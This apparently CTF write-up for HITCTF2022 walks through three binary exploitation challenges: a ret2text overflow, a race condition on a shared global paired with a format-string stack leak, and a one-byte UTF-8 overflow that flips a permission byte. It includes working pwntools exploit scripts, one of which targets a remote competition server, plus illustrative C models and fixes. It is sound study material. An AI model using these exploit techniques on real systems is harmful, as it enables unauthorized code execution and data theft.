Antiy Cup - HITCTF2022

ret2text, race condition, one-byte overflow


pwn

pwn_easy (pwn1: ret2text)

1. Analysing the program logic


main calls func with a1 = -559038737 (0xdeadbeef as a signed 32-bit int). Inside func, if a1 equals -889275714 (0xcafebabe as a signed 32-bit int) the password function is entered. Both the gets call in func and the read call in password are overflow points.

Combined with the system function and the /bin/sh string that the binary already contains, that is enough to get a shell.


2. Exploit

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

#context(arch="i386",os="linux",log_level="debug")

io = process('pwn_easy')

sys_plt = 0x080490E0
bin_sh = 0x0804a008

payload = b'a'*40
payload += p32(0xdeadbeef)
payload += p32(sys_plt) # ret
payload += p32(0xcafebabe) # overwrites a1; this would let us into the password function,
# but whether we get there does not matter: the target is the gets in func
payload += p32(bin_sh)

io.sendlineafter(b'Please input your username:',payload)

io.interactive()
```


time (pwn2: race condition)

1. Program logic analysis


From the analysis above we can see that is_secret_file, used in the check_file_name function, is a global variable: every worker thread reads and writes it. Now consider the following race condition:


Thread 1 has a1 = 1, is_secret_file = 1 and file_name = "flag.txt", so it should not satisfy the condition for the dispaly_file_content() branch. But there are several threads and is_secret_file is shared between them. If thread 2 happens to have just reached the point where it sets is_secret_file to 0, then when execution switches back to thread 1, is_secret_file is 0 and thread 1 enters the dispaly_file_content() branch, which reads "flag.txt" and continues processing it.
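To make that interleaving concrete, here is an added pthreads model (my code, not the challenge binary): one thread keeps requesting flag.txt while another requests a harmless name; with the verdict kept in the shared global, the first thread sometimes reaches the display branch, and with the verdict in a stack-local it never does. The function names, spin loop and file names are assumptions; build with -pthread.

```c
#include <pthread.h>
#include <stdio.h>
#include <string.h>

#define ROUNDS 200000

static volatile int is_secret_file;   /* shared by every request thread, as in the binary */

/* Vulnerable pattern (assumed model of check_file_name() plus the display branch):
 * the check stores its verdict in the global, and the branch reads the global again. */
static int request_shared(const char *name) {
    is_secret_file = (strcmp(name, "flag.txt") == 0);   /* check_file_name() */
    for (volatile int i = 0; i < 50; i++) {}            /* window for a context switch */
    return is_secret_file ? 0 : 1;                      /* 1 = dispaly_file_content() would run */
}

/* Fixed pattern: the verdict lives in a stack-local, so no other thread can flip it. */
static int request_local(const char *name) {
    int secret = (strcmp(name, "flag.txt") == 0);
    for (volatile int i = 0; i < 50; i++) {}
    return secret ? 0 : 1;
}

struct worker { int (*handler)(const char *); const char *name; long displayed; };

static void *run(void *arg) {
    struct worker *w = arg;
    for (int i = 0; i < ROUNDS; i++) w->displayed += w->handler(w->name);
    return NULL;
}

/* Thread 1 keeps requesting flag.txt while thread 2 requests a harmless file.
 * Returns how many times thread 1 reached the display branch (should be 0). */
long count_flag_displays(int (*handler)(const char *)) {
    struct worker t1 = { handler, "flag.txt", 0 }, t2 = { handler, "old_flag.txt", 0 };
    pthread_t a, b;
    pthread_create(&a, NULL, run, &t1);
    pthread_create(&b, NULL, run, &t2);
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    return t1.displayed;
}

int main(void) {
    printf("shared global: flag.txt displayed %ld times\n", count_flag_displays(request_shared));
    printf("stack local:   flag.txt displayed %ld times\n", count_flag_displays(request_local));
    return 0;
}
```

The count for the shared-global version varies from run to run, which is exactly the point: the outcome depends on scheduling, not on the input.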

Although what gets printed directly is the MD5 hash of the content, from which the original flag cannot be recovered,

in dispaly_file_content() we can see that the contents of flag.txt are copied onto the stack.


So, combined with the format-string vulnerability in the initially entered global variable gloabl_name, the data on the stack can be printed out (%p).


2. Exploit

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# context(arch="i386",os="linux",log_level="debug")
context(arch="i386",os="linux",log_level="error")
# io = process('./time')
io = remote("122.114.225.151",10000)

io.sendlineafter("Who are you?",b"%p "*80) # gloabl_name: format string that dumps the stack

io.sendlineafter("2.old_flag.txt",b"1") # check_file_name()

io.sendline(b"1")
io.sendline(b"1")
io.sendline(b"1")

io.sendline(b"2")

sleep(1)
io.recvuntil("2.old_flag.txt")
io.sendline(b"1")
io.sendline(b"1")
io.interactive()
```


```python
# Parsing script: reassemble the %p-leaked stack words (little-endian) into the flag bytes
from pwn import *

a = [0x3032465443544948, 0x2d656d69747b3232, 0x6c69662d612d7369, 0x772d746168742d65, 0x646e612d73726165, 0x6e2d73656b616d2d, 0x7d6573696f6e2d6f, 0xa]

result = b""

for i in a:
    result += p64(i)

print(result)
```




doc (pwn3: one-byte overflow)

Combining the hints on the web page with the IDA-decompiled code:


From the web page's hints we learn its execution flow: a user can upload a file via /doc/upload, list all current files via /doc/ls, view one file's contents via /doc/extract, and view several files' contents via /doc/extract_many.


The page's mode:FORBIDDEN hint for the flag also suggests the solving approach: change the flag's mode to ALLOW so that it becomes readable. Since the decompiled code contains functions named extract and extract_many, matching the two endpoints, we audit those two functions first, and while auditing extract_many we find that the strencodencpy function in get_utf8_text overflows by one byte at the boundary.


And any mode value other than 0 is treated as ALLOW.


Finally, given the value range of the fourth byte of a 4-byte UTF-8 character (a continuation byte, 0x80 to 0xBF, so never 0), picking any such character and placing it at the end does the job.
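Added example (my code, not the challenge's): a model of the boundary bug the text describes. The lead byte of each UTF-8 character is bounds-checked, but the continuation bytes use an off-by-one test, so a multi-byte character that starts just before the end of the buffer writes its last byte one past it; with the mode byte stored right after the text (assumed layout), that byte, always 0x80 to 0xBF, turns FORBIDDEN into ALLOW. The strict variant checks that the whole character fits. Names, layout and the exact form of the check are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Document record in which the permission byte directly follows the text buffer
 * (assumed layout, chosen to show how a single overrun byte flips it). 0 = FORBIDDEN. */
struct doc { char text[16]; unsigned char mode; };

/* Byte length of the UTF-8 sequence introduced by `lead` (0 = not a lead byte). */
static size_t utf8_len(unsigned char lead) {
    if (lead < 0x80) return 1;
    if ((lead & 0xE0) == 0xC0) return 2;
    if ((lead & 0xF0) == 0xE0) return 3;
    if ((lead & 0xF8) == 0xF0) return 4;
    return 0;
}

/* Copies whole UTF-8 characters from src into dst[n] and returns the bytes written.
 * strict == 0 models the off-by-one: ASCII can never overrun, but the last byte of a
 * multi-byte character may land at dst[n]. strict == 1 requires the whole character to fit. */
size_t utf8_ncpy(char *dst, size_t n, const char *src, int strict) {
    size_t out = 0, i = 0;
    while (src[i] && out < n) {                            /* lead byte is bounded correctly */
        size_t len = utf8_len((unsigned char)src[i]);
        if (len == 0) { i++; continue; }                   /* skip malformed bytes */
        if (strict && out + len > n) break;                /* fix: whole character must fit */
        dst[out++] = src[i++];
        for (size_t k = 1; k < len && src[i]; k++) {       /* continuation bytes */
            if (out > n) break;                            /* bug: should be out >= n */
            dst[out++] = src[i++];
        }
    }
    return out;
}

/* Simulates the copy extract_many performs into a record and reports the mode afterwards. */
unsigned char mode_after_copy(const char *src, int strict) {
    struct doc d;
    memset(&d, 0, sizeof d);                               /* text empty, mode FORBIDDEN */
    utf8_ncpy(d.text, sizeof d.text, src, strict);
    return d.mode;                                         /* any non-zero value reads as ALLOW */
}
```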


The contents of the doc file that was uploaded in the end:

```text
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa